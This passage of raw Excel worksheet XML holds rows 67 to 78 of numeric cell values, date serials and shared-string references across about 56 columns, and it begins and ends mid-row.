      <c r="AP67" t="s">
        <v>656</v>
      </c>
      <c r="AQ67" t="s">
        <v>657</v>
      </c>
      <c r="AR67" t="s">
        <v>654</v>
      </c>
      <c r="AS67" t="s">
        <v>553</v>
      </c>
      <c r="AT67" t="s">
        <v>58</v>
      </c>
      <c r="AU67">
        <v>26</v>
      </c>
      <c r="AV67">
        <v>0</v>
      </c>
      <c r="AW67">
        <v>10</v>
      </c>
      <c r="AX67">
        <v>0</v>
      </c>
      <c r="AY67">
        <v>8</v>
      </c>
      <c r="AZ67">
        <v>5</v>
      </c>
      <c r="BA67" t="s">
        <v>16664</v>
      </c>
      <c r="BB67" t="s">
        <v>14470</v>
      </c>
      <c r="BC67" t="s">
        <v>9841</v>
      </c>
      <c r="BD67">
        <v>0</v>
      </c>
    </row>
    <row r="68" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A68">
        <v>46</v>
      </c>
      <c r="B68" t="s">
        <v>658</v>
      </c>
      <c r="C68" t="s">
        <v>99</v>
      </c>
      <c r="D68" t="s">
        <v>659</v>
      </c>
      <c r="E68" t="s">
        <v>300</v>
      </c>
      <c r="F68" t="s">
        <v>660</v>
      </c>
      <c r="G68" s="1">
        <v>43928</v>
      </c>
      <c r="H68">
        <v>2015</v>
      </c>
      <c r="I68">
        <v>2015</v>
      </c>
      <c r="J68">
        <v>5</v>
      </c>
      <c r="K68">
        <v>1</v>
      </c>
      <c r="L68">
        <v>2</v>
      </c>
      <c r="M68">
        <v>0</v>
      </c>
      <c r="N68">
        <v>0</v>
      </c>
      <c r="O68">
        <v>1</v>
      </c>
      <c r="P68">
        <v>0</v>
      </c>
      <c r="Q68">
        <v>5</v>
      </c>
      <c r="R68">
        <v>4</v>
      </c>
      <c r="S68">
        <v>0</v>
      </c>
      <c r="T68">
        <v>0</v>
      </c>
      <c r="U68">
        <v>2500000</v>
      </c>
      <c r="V68">
        <v>1</v>
      </c>
      <c r="W68">
        <v>10000</v>
      </c>
      <c r="X68">
        <v>0</v>
      </c>
      <c r="Y68">
        <v>0</v>
      </c>
      <c r="Z68">
        <v>1</v>
      </c>
      <c r="AA68">
        <v>0</v>
      </c>
      <c r="AB68">
        <v>0</v>
      </c>
      <c r="AC68">
        <v>0</v>
      </c>
      <c r="AD68">
        <v>0</v>
      </c>
      <c r="AE68">
        <v>0</v>
      </c>
      <c r="AF68" t="s">
        <v>661</v>
      </c>
      <c r="AG68">
        <v>14440</v>
      </c>
      <c r="AH68">
        <v>12</v>
      </c>
      <c r="AJ68">
        <v>160</v>
      </c>
      <c r="AK68" t="s">
        <v>114</v>
      </c>
      <c r="AL68" t="s">
        <v>114</v>
      </c>
      <c r="AM68" t="s">
        <v>662</v>
      </c>
      <c r="AN68" t="s">
        <v>55</v>
      </c>
      <c r="AO68">
        <v>2012</v>
      </c>
      <c r="AP68">
        <v>6631091</v>
      </c>
      <c r="AQ68" t="s">
        <v>663</v>
      </c>
      <c r="AR68" t="s">
        <v>661</v>
      </c>
      <c r="AS68" t="s">
        <v>71</v>
      </c>
      <c r="AT68" t="s">
        <v>58</v>
      </c>
      <c r="AU68">
        <v>26</v>
      </c>
      <c r="AV68">
        <v>1</v>
      </c>
      <c r="AW68">
        <v>18</v>
      </c>
      <c r="AX68">
        <v>20</v>
      </c>
      <c r="AY68">
        <v>33</v>
      </c>
      <c r="AZ68">
        <v>34</v>
      </c>
      <c r="BA68" t="s">
        <v>17308</v>
      </c>
      <c r="BB68" t="s">
        <v>14248</v>
      </c>
      <c r="BC68" t="s">
        <v>11238</v>
      </c>
      <c r="BD68" t="s">
        <v>10474</v>
      </c>
    </row>
    <row r="69" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A69">
        <v>704</v>
      </c>
      <c r="B69" t="s">
        <v>664</v>
      </c>
      <c r="C69" t="s">
        <v>47</v>
      </c>
      <c r="D69" t="s">
        <v>665</v>
      </c>
      <c r="E69" t="s">
        <v>142</v>
      </c>
      <c r="F69" t="s">
        <v>666</v>
      </c>
      <c r="G69" s="1">
        <v>43942</v>
      </c>
      <c r="H69">
        <v>2053</v>
      </c>
      <c r="I69">
        <v>2053</v>
      </c>
      <c r="J69">
        <v>3</v>
      </c>
      <c r="K69">
        <v>0</v>
      </c>
      <c r="L69">
        <v>0</v>
      </c>
      <c r="M69">
        <v>0</v>
      </c>
      <c r="N69">
        <v>0</v>
      </c>
      <c r="O69">
        <v>0</v>
      </c>
      <c r="P69">
        <v>0</v>
      </c>
      <c r="Q69">
        <v>1</v>
      </c>
      <c r="R69">
        <v>0</v>
      </c>
      <c r="S69">
        <v>0</v>
      </c>
      <c r="T69">
        <v>1</v>
      </c>
      <c r="U69">
        <v>500000</v>
      </c>
      <c r="V69">
        <v>0</v>
      </c>
      <c r="W69">
        <v>0</v>
      </c>
      <c r="X69">
        <v>0</v>
      </c>
      <c r="Y69">
        <v>0</v>
      </c>
      <c r="Z69">
        <v>0</v>
      </c>
      <c r="AA69">
        <v>0</v>
      </c>
      <c r="AB69">
        <v>0</v>
      </c>
      <c r="AC69">
        <v>0</v>
      </c>
      <c r="AD69">
        <v>0</v>
      </c>
      <c r="AE69">
        <v>100000</v>
      </c>
      <c r="AF69" t="s">
        <v>667</v>
      </c>
      <c r="AG69">
        <v>21335</v>
      </c>
      <c r="AH69">
        <v>2</v>
      </c>
      <c r="AJ69">
        <v>50</v>
      </c>
      <c r="AK69" t="s">
        <v>443</v>
      </c>
      <c r="AL69" t="s">
        <v>668</v>
      </c>
      <c r="AM69" t="s">
        <v>669</v>
      </c>
      <c r="AN69" t="s">
        <v>55</v>
      </c>
      <c r="AO69">
        <v>2016</v>
      </c>
      <c r="AP69">
        <v>85362140618</v>
      </c>
      <c r="AQ69" t="s">
        <v>670</v>
      </c>
      <c r="AR69" t="s">
        <v>667</v>
      </c>
      <c r="AS69" t="s">
        <v>179</v>
      </c>
      <c r="AT69" t="s">
        <v>58</v>
      </c>
      <c r="AU69">
        <v>26</v>
      </c>
      <c r="AV69">
        <v>0</v>
      </c>
      <c r="AW69">
        <v>0</v>
      </c>
      <c r="AX69">
        <v>0</v>
      </c>
      <c r="AY69">
        <v>5</v>
      </c>
      <c r="AZ69">
        <v>2</v>
      </c>
      <c r="BA69" t="s">
        <v>17261</v>
      </c>
      <c r="BB69" t="s">
        <v>14790</v>
      </c>
      <c r="BC69" t="s">
        <v>10407</v>
      </c>
      <c r="BD69">
        <v>0</v>
      </c>
    </row>
    <row r="70" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A70">
        <v>560</v>
      </c>
      <c r="B70" t="s">
        <v>671</v>
      </c>
      <c r="C70" t="s">
        <v>607</v>
      </c>
      <c r="D70" t="s">
        <v>672</v>
      </c>
      <c r="E70" t="s">
        <v>142</v>
      </c>
      <c r="F70" t="s">
        <v>673</v>
      </c>
      <c r="G70" s="1">
        <v>43949</v>
      </c>
      <c r="H70">
        <v>2075</v>
      </c>
      <c r="I70">
        <v>2075</v>
      </c>
      <c r="J70">
        <v>1</v>
      </c>
      <c r="K70">
        <v>0</v>
      </c>
      <c r="L70">
        <v>0</v>
      </c>
      <c r="M70">
        <v>2</v>
      </c>
      <c r="N70">
        <v>0</v>
      </c>
      <c r="O70">
        <v>0</v>
      </c>
      <c r="P70">
        <v>0</v>
      </c>
      <c r="Q70">
        <v>5</v>
      </c>
      <c r="R70">
        <v>55</v>
      </c>
      <c r="S70">
        <v>0</v>
      </c>
      <c r="T70">
        <v>1</v>
      </c>
      <c r="U70">
        <v>40000</v>
      </c>
      <c r="V70">
        <v>0</v>
      </c>
      <c r="W70">
        <v>0</v>
      </c>
      <c r="X70">
        <v>1700</v>
      </c>
      <c r="Y70">
        <v>0</v>
      </c>
      <c r="Z70">
        <v>0</v>
      </c>
      <c r="AA70">
        <v>0</v>
      </c>
      <c r="AB70">
        <v>0</v>
      </c>
      <c r="AC70">
        <v>25000</v>
      </c>
      <c r="AD70">
        <v>0</v>
      </c>
      <c r="AE70">
        <v>0</v>
      </c>
      <c r="AF70" t="s">
        <v>674</v>
      </c>
      <c r="AG70">
        <v>77126</v>
      </c>
      <c r="AH70">
        <v>24</v>
      </c>
      <c r="AJ70">
        <v>370</v>
      </c>
      <c r="AK70" t="s">
        <v>675</v>
      </c>
      <c r="AL70" t="s">
        <v>676</v>
      </c>
      <c r="AM70" t="s">
        <v>677</v>
      </c>
      <c r="AN70" t="s">
        <v>55</v>
      </c>
      <c r="AO70">
        <v>2018</v>
      </c>
      <c r="AP70" t="s">
        <v>678</v>
      </c>
      <c r="AQ70" t="s">
        <v>679</v>
      </c>
      <c r="AR70" t="s">
        <v>674</v>
      </c>
      <c r="AS70" t="s">
        <v>71</v>
      </c>
      <c r="AT70" t="s">
        <v>58</v>
      </c>
      <c r="AU70">
        <v>24</v>
      </c>
      <c r="AV70">
        <v>1</v>
      </c>
      <c r="AW70">
        <v>27</v>
      </c>
      <c r="AX70">
        <v>33</v>
      </c>
      <c r="AY70">
        <v>3</v>
      </c>
      <c r="AZ70">
        <v>1</v>
      </c>
      <c r="BA70" t="s">
        <v>16854</v>
      </c>
      <c r="BB70" t="s">
        <v>14674</v>
      </c>
      <c r="BC70" t="s">
        <v>9536</v>
      </c>
      <c r="BD70">
        <v>0</v>
      </c>
    </row>
    <row r="71" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A71">
        <v>656</v>
      </c>
      <c r="B71" t="s">
        <v>680</v>
      </c>
      <c r="C71" t="s">
        <v>47</v>
      </c>
      <c r="D71" t="s">
        <v>681</v>
      </c>
      <c r="E71" t="s">
        <v>682</v>
      </c>
      <c r="F71" t="s">
        <v>683</v>
      </c>
      <c r="G71" s="1">
        <v>43966</v>
      </c>
      <c r="H71">
        <v>2094</v>
      </c>
      <c r="I71">
        <v>2094</v>
      </c>
      <c r="J71">
        <v>1</v>
      </c>
      <c r="K71">
        <v>1</v>
      </c>
      <c r="L71">
        <v>0</v>
      </c>
      <c r="M71">
        <v>0</v>
      </c>
      <c r="N71">
        <v>200</v>
      </c>
      <c r="O71">
        <v>1</v>
      </c>
      <c r="P71">
        <v>0</v>
      </c>
      <c r="Q71">
        <v>1</v>
      </c>
      <c r="R71">
        <v>1</v>
      </c>
      <c r="S71">
        <v>0</v>
      </c>
      <c r="T71">
        <v>1</v>
      </c>
      <c r="U71">
        <v>500</v>
      </c>
      <c r="V71">
        <v>500</v>
      </c>
      <c r="W71">
        <v>0</v>
      </c>
      <c r="X71">
        <v>0</v>
      </c>
      <c r="Y71">
        <v>0</v>
      </c>
      <c r="Z71">
        <v>300</v>
      </c>
      <c r="AA71">
        <v>0</v>
      </c>
      <c r="AB71">
        <v>500</v>
      </c>
      <c r="AC71">
        <v>500</v>
      </c>
      <c r="AD71">
        <v>0</v>
      </c>
      <c r="AE71">
        <v>2000</v>
      </c>
      <c r="AF71" t="s">
        <v>684</v>
      </c>
      <c r="AG71">
        <v>21352</v>
      </c>
      <c r="AH71">
        <v>2</v>
      </c>
      <c r="AJ71">
        <v>31</v>
      </c>
      <c r="AK71" t="s">
        <v>685</v>
      </c>
      <c r="AL71" t="s">
        <v>686</v>
      </c>
      <c r="AM71" t="s">
        <v>687</v>
      </c>
      <c r="AN71" t="s">
        <v>55</v>
      </c>
      <c r="AO71">
        <v>2015</v>
      </c>
      <c r="AP71">
        <v>85265629386</v>
      </c>
      <c r="AQ71" t="s">
        <v>688</v>
      </c>
      <c r="AR71" t="s">
        <v>684</v>
      </c>
      <c r="AS71" t="s">
        <v>71</v>
      </c>
      <c r="AT71" t="s">
        <v>58</v>
      </c>
      <c r="AU71">
        <v>30</v>
      </c>
      <c r="AV71">
        <v>30</v>
      </c>
      <c r="AW71">
        <v>4</v>
      </c>
      <c r="AX71">
        <v>4</v>
      </c>
      <c r="AY71">
        <v>18</v>
      </c>
      <c r="AZ71">
        <v>10</v>
      </c>
      <c r="BA71" t="s">
        <v>16731</v>
      </c>
      <c r="BB71" t="s">
        <v>14754</v>
      </c>
      <c r="BC71">
        <v>0</v>
      </c>
      <c r="BD71" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="72" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A72">
        <v>680</v>
      </c>
      <c r="B72" t="s">
        <v>689</v>
      </c>
      <c r="C72" t="s">
        <v>88</v>
      </c>
      <c r="D72" t="s">
        <v>690</v>
      </c>
      <c r="E72" t="s">
        <v>111</v>
      </c>
      <c r="F72" t="s">
        <v>691</v>
      </c>
      <c r="G72" s="1">
        <v>43970</v>
      </c>
      <c r="H72">
        <v>2116</v>
      </c>
      <c r="I72">
        <v>2116</v>
      </c>
      <c r="J72">
        <v>3</v>
      </c>
      <c r="K72">
        <v>2</v>
      </c>
      <c r="L72">
        <v>1</v>
      </c>
      <c r="M72">
        <v>0</v>
      </c>
      <c r="N72">
        <v>0</v>
      </c>
      <c r="O72">
        <v>0</v>
      </c>
      <c r="P72">
        <v>0</v>
      </c>
      <c r="Q72">
        <v>0</v>
      </c>
      <c r="R72">
        <v>2</v>
      </c>
      <c r="S72">
        <v>1</v>
      </c>
      <c r="T72">
        <v>0</v>
      </c>
      <c r="U72">
        <v>400</v>
      </c>
      <c r="V72">
        <v>2</v>
      </c>
      <c r="W72">
        <v>20</v>
      </c>
      <c r="X72">
        <v>0</v>
      </c>
      <c r="Y72">
        <v>0</v>
      </c>
      <c r="Z72">
        <v>0</v>
      </c>
      <c r="AA72">
        <v>0</v>
      </c>
      <c r="AB72">
        <v>0</v>
      </c>
      <c r="AC72">
        <v>1</v>
      </c>
      <c r="AD72">
        <v>1</v>
      </c>
      <c r="AE72">
        <v>0</v>
      </c>
      <c r="AF72" t="s">
        <v>692</v>
      </c>
      <c r="AG72">
        <v>80222</v>
      </c>
      <c r="AH72">
        <v>17</v>
      </c>
      <c r="AJ72">
        <v>282</v>
      </c>
      <c r="AK72" t="s">
        <v>693</v>
      </c>
      <c r="AL72" t="s">
        <v>602</v>
      </c>
      <c r="AM72" t="s">
        <v>694</v>
      </c>
      <c r="AN72" t="s">
        <v>55</v>
      </c>
      <c r="AO72">
        <v>1996</v>
      </c>
      <c r="AP72" t="s">
        <v>695</v>
      </c>
      <c r="AQ72" t="s">
        <v>696</v>
      </c>
      <c r="AR72" t="s">
        <v>692</v>
      </c>
      <c r="AS72" t="s">
        <v>71</v>
      </c>
      <c r="AT72" t="s">
        <v>58</v>
      </c>
      <c r="AU72">
        <v>0</v>
      </c>
      <c r="AV72">
        <v>0</v>
      </c>
      <c r="AW72">
        <v>0</v>
      </c>
      <c r="AX72">
        <v>0</v>
      </c>
      <c r="AY72">
        <v>39</v>
      </c>
      <c r="AZ72">
        <v>8</v>
      </c>
      <c r="BA72" t="s">
        <v>17347</v>
      </c>
      <c r="BB72" t="s">
        <v>14771</v>
      </c>
      <c r="BC72" t="s">
        <v>10430</v>
      </c>
      <c r="BD72" t="s">
        <v>10429</v>
      </c>
    </row>
    <row r="73" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A73">
        <v>170</v>
      </c>
      <c r="B73" t="s">
        <v>697</v>
      </c>
      <c r="C73" t="s">
        <v>215</v>
      </c>
      <c r="D73" t="s">
        <v>698</v>
      </c>
      <c r="E73" t="s">
        <v>142</v>
      </c>
      <c r="F73" t="s">
        <v>699</v>
      </c>
      <c r="G73" s="1">
        <v>43910</v>
      </c>
      <c r="H73">
        <v>2170</v>
      </c>
      <c r="I73">
        <v>2170</v>
      </c>
      <c r="J73">
        <v>2</v>
      </c>
      <c r="K73">
        <v>0</v>
      </c>
      <c r="L73">
        <v>2</v>
      </c>
      <c r="M73">
        <v>3</v>
      </c>
      <c r="N73">
        <v>0</v>
      </c>
      <c r="O73">
        <v>0</v>
      </c>
      <c r="P73">
        <v>0</v>
      </c>
      <c r="Q73">
        <v>3</v>
      </c>
      <c r="R73">
        <v>15</v>
      </c>
      <c r="S73">
        <v>0</v>
      </c>
      <c r="T73">
        <v>0</v>
      </c>
      <c r="U73">
        <v>50</v>
      </c>
      <c r="V73">
        <v>0</v>
      </c>
      <c r="W73">
        <v>8</v>
      </c>
      <c r="X73">
        <v>3</v>
      </c>
      <c r="Y73">
        <v>0</v>
      </c>
      <c r="Z73">
        <v>0</v>
      </c>
      <c r="AA73">
        <v>0</v>
      </c>
      <c r="AB73">
        <v>2400</v>
      </c>
      <c r="AC73">
        <v>12000</v>
      </c>
      <c r="AD73">
        <v>0</v>
      </c>
      <c r="AE73">
        <v>0</v>
      </c>
      <c r="AF73" t="s">
        <v>700</v>
      </c>
      <c r="AG73">
        <v>33411</v>
      </c>
      <c r="AH73">
        <v>6</v>
      </c>
      <c r="AJ73">
        <v>142</v>
      </c>
      <c r="AK73" t="s">
        <v>219</v>
      </c>
      <c r="AL73" t="s">
        <v>220</v>
      </c>
      <c r="AM73" t="s">
        <v>701</v>
      </c>
      <c r="AN73" t="s">
        <v>55</v>
      </c>
      <c r="AO73">
        <v>2004</v>
      </c>
      <c r="AP73">
        <v>71725338</v>
      </c>
      <c r="AQ73">
        <v>81377890519</v>
      </c>
      <c r="AR73" t="s">
        <v>700</v>
      </c>
      <c r="AU73">
        <v>26</v>
      </c>
      <c r="AV73">
        <v>0</v>
      </c>
      <c r="AW73">
        <v>10</v>
      </c>
      <c r="AX73">
        <v>10</v>
      </c>
      <c r="AY73">
        <v>15</v>
      </c>
      <c r="AZ73">
        <v>10</v>
      </c>
      <c r="BA73" t="s">
        <v>16626</v>
      </c>
      <c r="BB73" t="s">
        <v>14355</v>
      </c>
      <c r="BC73" t="s">
        <v>9550</v>
      </c>
      <c r="BD73" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="74" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A74">
        <v>280</v>
      </c>
      <c r="B74" t="s">
        <v>702</v>
      </c>
      <c r="C74" t="s">
        <v>157</v>
      </c>
      <c r="D74" t="s">
        <v>703</v>
      </c>
      <c r="E74" t="s">
        <v>142</v>
      </c>
      <c r="F74" t="s">
        <v>704</v>
      </c>
      <c r="G74" s="1">
        <v>44176</v>
      </c>
      <c r="H74">
        <v>2184</v>
      </c>
      <c r="I74">
        <v>2184</v>
      </c>
      <c r="J74">
        <v>2</v>
      </c>
      <c r="K74">
        <v>0</v>
      </c>
      <c r="L74">
        <v>0</v>
      </c>
      <c r="M74">
        <v>2</v>
      </c>
      <c r="N74">
        <v>3500</v>
      </c>
      <c r="O74">
        <v>0</v>
      </c>
      <c r="P74">
        <v>0</v>
      </c>
      <c r="Q74">
        <v>1</v>
      </c>
      <c r="R74">
        <v>120</v>
      </c>
      <c r="S74">
        <v>0</v>
      </c>
      <c r="T74">
        <v>2</v>
      </c>
      <c r="U74">
        <v>150000</v>
      </c>
      <c r="V74">
        <v>0</v>
      </c>
      <c r="W74">
        <v>0</v>
      </c>
      <c r="X74">
        <v>900</v>
      </c>
      <c r="Y74">
        <v>0</v>
      </c>
      <c r="Z74">
        <v>0</v>
      </c>
      <c r="AA74">
        <v>0</v>
      </c>
      <c r="AB74">
        <v>1000</v>
      </c>
      <c r="AC74">
        <v>7500</v>
      </c>
      <c r="AD74">
        <v>0</v>
      </c>
      <c r="AE74">
        <v>5000</v>
      </c>
      <c r="AF74" t="s">
        <v>705</v>
      </c>
      <c r="AG74">
        <v>61252</v>
      </c>
      <c r="AH74">
        <v>16</v>
      </c>
      <c r="AJ74">
        <v>242</v>
      </c>
      <c r="AK74" t="s">
        <v>706</v>
      </c>
      <c r="AL74" t="s">
        <v>707</v>
      </c>
      <c r="AM74" t="s">
        <v>708</v>
      </c>
      <c r="AN74" t="s">
        <v>55</v>
      </c>
      <c r="AO74">
        <v>2003</v>
      </c>
      <c r="AP74" t="s">
        <v>709</v>
      </c>
      <c r="AQ74" t="s">
        <v>710</v>
      </c>
      <c r="AR74" t="s">
        <v>705</v>
      </c>
      <c r="AS74" t="s">
        <v>71</v>
      </c>
      <c r="AT74" t="s">
        <v>58</v>
      </c>
      <c r="AU74">
        <v>25</v>
      </c>
      <c r="AV74">
        <v>1</v>
      </c>
      <c r="AW74">
        <v>57</v>
      </c>
      <c r="AX74">
        <v>91</v>
      </c>
      <c r="AY74">
        <v>65</v>
      </c>
      <c r="AZ74">
        <v>13</v>
      </c>
      <c r="BA74" t="s">
        <v>17279</v>
      </c>
      <c r="BB74" t="s">
        <v>14449</v>
      </c>
      <c r="BC74" t="s">
        <v>10323</v>
      </c>
      <c r="BD74" t="s">
        <v>10485</v>
      </c>
    </row>
    <row r="75" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A75">
        <v>759</v>
      </c>
      <c r="B75" t="s">
        <v>711</v>
      </c>
      <c r="C75" t="s">
        <v>477</v>
      </c>
      <c r="D75" t="s">
        <v>712</v>
      </c>
      <c r="E75" t="s">
        <v>528</v>
      </c>
      <c r="F75" t="s">
        <v>713</v>
      </c>
      <c r="G75" s="1">
        <v>43943</v>
      </c>
      <c r="H75">
        <v>2224</v>
      </c>
      <c r="I75">
        <v>2224</v>
      </c>
      <c r="J75">
        <v>0</v>
      </c>
      <c r="K75">
        <v>0</v>
      </c>
      <c r="L75">
        <v>0</v>
      </c>
      <c r="M75">
        <v>0</v>
      </c>
      <c r="N75">
        <v>0</v>
      </c>
      <c r="O75">
        <v>0</v>
      </c>
      <c r="P75">
        <v>0</v>
      </c>
      <c r="Q75">
        <v>0</v>
      </c>
      <c r="R75">
        <v>16</v>
      </c>
      <c r="S75">
        <v>0</v>
      </c>
      <c r="T75">
        <v>0</v>
      </c>
      <c r="U75">
        <v>0</v>
      </c>
      <c r="V75">
        <v>0</v>
      </c>
      <c r="W75">
        <v>0</v>
      </c>
      <c r="X75">
        <v>0</v>
      </c>
      <c r="Y75">
        <v>0</v>
      </c>
      <c r="Z75">
        <v>0</v>
      </c>
      <c r="AA75">
        <v>0</v>
      </c>
      <c r="AB75">
        <v>0</v>
      </c>
      <c r="AC75">
        <v>2400</v>
      </c>
      <c r="AD75">
        <v>0</v>
      </c>
      <c r="AE75">
        <v>0</v>
      </c>
      <c r="AF75" t="s">
        <v>714</v>
      </c>
      <c r="AG75">
        <v>95378</v>
      </c>
      <c r="AH75">
        <v>29</v>
      </c>
      <c r="AJ75">
        <v>376</v>
      </c>
      <c r="AK75" t="s">
        <v>715</v>
      </c>
      <c r="AL75" t="s">
        <v>716</v>
      </c>
      <c r="AM75" t="s">
        <v>717</v>
      </c>
      <c r="AN75" t="s">
        <v>68</v>
      </c>
      <c r="AO75">
        <v>2018</v>
      </c>
      <c r="AP75">
        <v>81283825699</v>
      </c>
      <c r="AQ75" t="s">
        <v>718</v>
      </c>
      <c r="AR75" t="s">
        <v>718</v>
      </c>
      <c r="AS75" t="s">
        <v>371</v>
      </c>
      <c r="AT75" t="s">
        <v>72</v>
      </c>
      <c r="AU75">
        <v>25</v>
      </c>
      <c r="AV75">
        <v>1</v>
      </c>
      <c r="AW75">
        <v>0</v>
      </c>
      <c r="AX75">
        <v>0</v>
      </c>
      <c r="AY75">
        <v>9</v>
      </c>
      <c r="AZ75">
        <v>0</v>
      </c>
      <c r="BA75" t="s">
        <v>17256</v>
      </c>
      <c r="BB75" t="s">
        <v>14831</v>
      </c>
      <c r="BC75" t="s">
        <v>9571</v>
      </c>
      <c r="BD75" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="76" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A76">
        <v>825</v>
      </c>
      <c r="B76" t="s">
        <v>719</v>
      </c>
      <c r="C76" t="s">
        <v>129</v>
      </c>
      <c r="D76" t="s">
        <v>273</v>
      </c>
      <c r="E76" t="s">
        <v>142</v>
      </c>
      <c r="F76" t="s">
        <v>562</v>
      </c>
      <c r="G76" s="1">
        <v>43944</v>
      </c>
      <c r="H76">
        <v>2233</v>
      </c>
      <c r="I76">
        <v>2233</v>
      </c>
      <c r="J76">
        <v>2</v>
      </c>
      <c r="K76">
        <v>0</v>
      </c>
      <c r="L76">
        <v>0</v>
      </c>
      <c r="M76">
        <v>2</v>
      </c>
      <c r="N76">
        <v>3</v>
      </c>
      <c r="O76">
        <v>0</v>
      </c>
      <c r="P76">
        <v>0</v>
      </c>
      <c r="Q76">
        <v>2</v>
      </c>
      <c r="R76">
        <v>0</v>
      </c>
      <c r="S76">
        <v>0</v>
      </c>
      <c r="T76">
        <v>1</v>
      </c>
      <c r="U76">
        <v>1500000</v>
      </c>
      <c r="V76">
        <v>0</v>
      </c>
      <c r="W76">
        <v>0</v>
      </c>
      <c r="X76">
        <v>900</v>
      </c>
      <c r="Y76">
        <v>0</v>
      </c>
      <c r="Z76">
        <v>0</v>
      </c>
      <c r="AA76">
        <v>0</v>
      </c>
      <c r="AB76">
        <v>25000</v>
      </c>
      <c r="AC76">
        <v>0</v>
      </c>
      <c r="AD76">
        <v>0</v>
      </c>
      <c r="AE76">
        <v>0</v>
      </c>
      <c r="AF76" t="s">
        <v>720</v>
      </c>
      <c r="AG76">
        <v>15710</v>
      </c>
      <c r="AH76">
        <v>11</v>
      </c>
      <c r="AJ76">
        <v>268</v>
      </c>
      <c r="AK76" t="s">
        <v>277</v>
      </c>
      <c r="AL76" t="s">
        <v>278</v>
      </c>
      <c r="AM76" t="s">
        <v>721</v>
      </c>
      <c r="AN76" t="s">
        <v>55</v>
      </c>
      <c r="AO76">
        <v>1994</v>
      </c>
      <c r="AP76" t="s">
        <v>722</v>
      </c>
      <c r="AQ76" t="s">
        <v>723</v>
      </c>
      <c r="AR76" t="s">
        <v>724</v>
      </c>
      <c r="AS76" t="s">
        <v>71</v>
      </c>
      <c r="AT76" t="s">
        <v>58</v>
      </c>
      <c r="AU76">
        <v>26</v>
      </c>
      <c r="AV76">
        <v>1</v>
      </c>
      <c r="AW76">
        <v>142</v>
      </c>
      <c r="AX76">
        <v>644</v>
      </c>
      <c r="AY76">
        <v>14</v>
      </c>
      <c r="AZ76">
        <v>9</v>
      </c>
      <c r="BA76" t="s">
        <v>16761</v>
      </c>
      <c r="BB76" t="s">
        <v>14875</v>
      </c>
      <c r="BC76">
        <v>0</v>
      </c>
      <c r="BD76" t="s">
        <v>9832</v>
      </c>
    </row>
    <row r="77" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A77">
        <v>782</v>
      </c>
      <c r="B77" t="s">
        <v>725</v>
      </c>
      <c r="C77" t="s">
        <v>726</v>
      </c>
      <c r="D77" t="s">
        <v>727</v>
      </c>
      <c r="E77" t="s">
        <v>111</v>
      </c>
      <c r="F77" t="s">
        <v>728</v>
      </c>
      <c r="G77" s="1">
        <v>43910</v>
      </c>
      <c r="H77">
        <v>2239</v>
      </c>
      <c r="I77">
        <v>2239</v>
      </c>
      <c r="J77">
        <v>1</v>
      </c>
      <c r="K77">
        <v>1</v>
      </c>
      <c r="L77">
        <v>2</v>
      </c>
      <c r="M77">
        <v>0</v>
      </c>
      <c r="N77">
        <v>0</v>
      </c>
      <c r="O77">
        <v>0</v>
      </c>
      <c r="P77">
        <v>0</v>
      </c>
      <c r="Q77">
        <v>1</v>
      </c>
      <c r="R77">
        <v>6</v>
      </c>
      <c r="S77">
        <v>0</v>
      </c>
      <c r="T77">
        <v>0</v>
      </c>
      <c r="U77">
        <v>100000</v>
      </c>
      <c r="V77">
        <v>1</v>
      </c>
      <c r="W77">
        <v>8000</v>
      </c>
      <c r="X77">
        <v>0</v>
      </c>
      <c r="Y77">
        <v>0</v>
      </c>
      <c r="Z77">
        <v>0</v>
      </c>
      <c r="AA77">
        <v>0</v>
      </c>
      <c r="AB77">
        <v>1000</v>
      </c>
      <c r="AC77">
        <v>6000</v>
      </c>
      <c r="AD77">
        <v>0</v>
      </c>
      <c r="AE77">
        <v>0</v>
      </c>
      <c r="AF77" t="s">
        <v>729</v>
      </c>
      <c r="AG77">
        <v>0</v>
      </c>
      <c r="AH77">
        <v>32</v>
      </c>
      <c r="AJ77">
        <v>466</v>
      </c>
      <c r="AK77" t="s">
        <v>730</v>
      </c>
      <c r="AL77" t="s">
        <v>731</v>
      </c>
      <c r="AM77" t="s">
        <v>732</v>
      </c>
      <c r="AN77" t="s">
        <v>68</v>
      </c>
      <c r="AO77">
        <v>2016</v>
      </c>
      <c r="AP77">
        <v>81236850891</v>
      </c>
      <c r="AQ77" t="s">
        <v>733</v>
      </c>
      <c r="AR77" t="s">
        <v>734</v>
      </c>
      <c r="AS77" t="s">
        <v>71</v>
      </c>
      <c r="AT77" t="s">
        <v>58</v>
      </c>
      <c r="AU77">
        <v>0</v>
      </c>
      <c r="AV77">
        <v>0</v>
      </c>
      <c r="AW77">
        <v>0</v>
      </c>
      <c r="AX77">
        <v>0</v>
      </c>
      <c r="AY77">
        <v>7</v>
      </c>
      <c r="AZ77">
        <v>3</v>
      </c>
      <c r="BA77" t="s">
        <v>17319</v>
      </c>
      <c r="BB77" t="s">
        <v>14853</v>
      </c>
      <c r="BC77" t="s">
        <v>10501</v>
      </c>
      <c r="BD77" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="78" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A78">
        <v>830</v>
      </c>
      <c r="B78" t="s">
        <v>735</v>
      </c>
      <c r="C78" t="s">
        <v>74</v>
      </c>
      <c r="D78" t="s">
        <v>736</v>
      </c>
      <c r="E78" t="s">
        <v>142</v>
      </c>
      <c r="F78" t="s">
        <v>737</v>
      </c>
      <c r="G78" s="1">
        <v>44046</v>
      </c>
      <c r="H78">
        <v>2263</v>
      </c>
      <c r="I78">
        <v>2263</v>
      </c>
      <c r="J78">
        <v>8</v>
      </c>
      <c r="K78">
        <v>0</v>
      </c>
      <c r="L78">
        <v>1</v>
      </c>
      <c r="M78">
        <v>2</v>
      </c>
      <c r="N78">
        <v>2000</v>
      </c>
      <c r="O78">
        <v>0</v>
      </c>
      <c r="P78">
